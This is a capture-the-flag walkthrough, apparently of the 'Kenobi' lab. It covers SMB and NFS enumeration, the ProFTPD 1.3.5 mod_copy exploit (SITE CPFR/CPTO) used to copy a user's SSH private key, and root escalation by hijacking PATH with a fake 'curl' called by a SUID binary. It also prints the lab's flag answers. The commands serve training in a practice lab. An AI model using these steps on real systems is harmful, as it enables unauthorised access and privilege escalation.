In this room we practice to enumerate and exploit vulnerabilities on Linux servers.
Task 1 Deploy the vulnerable machine
Let’s use nmap and enumerate the attached virtual machine!
Scan the machine with nmap, how many ports are open? 7
Task 2 Enumerating Samba for shares
Samba can be further enumerated with nmap.
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <VM_IP>Using the nmap command above, how many shares have been found? 3
Then we can check the share.
smbclient //<VM_IP>/anonymousOnce you’re connected, list the files on the share. What is the file can you see? log.txt
We can download the file recursively from the Samba share.
smbget -R smb://<VM_IP>/anonymousCheking the log.txt file we will see the answer for the next question.
What port is FTP running on? 21
In the next task we are going to run nmap again and check the port 111.
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <VM_IP>What mount can we see? /var
Task 3 Gain initial access with ProFtpd
Let’s netcat to the FTP port and see the FTP server version!
nc <VM_IP> 21What is the version? 1.3.5
Next we have to use searchsploit to find exploits to this ProFtpd version.
searchsploit proftpd 1.3.5
Important note: using the AttackBox caused a different result at the time of writing this article! The right answer can be found using the Kali machine, or any other machine with installed searchsploit.
How many exploits are there for the ProFTPd running? 4
nc <VM_IP>
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [<VM_IP>]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
Then let’s mount the /var directory!
mkdir /mnt/kenobiNFS
mount <machine_ip>:/var /mnt/kenobiNFSNow we can use the private SSH key of the kenobi user to SSH into the box.
cp /mnt/kenobiNFS/tmp/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa kenobi@<VM_IP>We will see the file now.
What is Kenobi’s user flag (/home/kenobi/user.txt)? d0b0f3f53b6caa532a83915e19224899
Task 4 Privilege Escalation with Path Variable Manipulation
Firstly just run the provided command and look for the binaries with SUID bit.
find / -perm -u=s -type f 2>/dev/nullOne of the binaries will catch our attention.
What file looks particularly out of the ordinary? /usr/bin/menu
Run the binary, how many options appear? 3
Then the text suggests us to use strings to check the binary. Let’s run it!
strings /usr/bin/menuIn the output we will see the “status check” runs the curl -I localhost command.
Following the task we will prepare our own curl command that will invoke a shell.
echo /bin/sh > curl
chmod 777 curl
mv curl /tmp
cd /tmp/
export PATH=/tmp:$PATH
/usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# ls /root
root.txt
# cat /root/root.txt
177b3cd8562289f37382721c28381f02After running the /usr/bin/menu and choosing our prepared first option we are landing in a root shell.
We can see the root’s home directory and its files now.
What is the root flag (/root/root.txt)? 177b3cd8562289f37382721c28381f02
This room is done.
If you have anything to share then please visit my Tom’s IT Cafe Discord Server!
Tom's IT Cafe 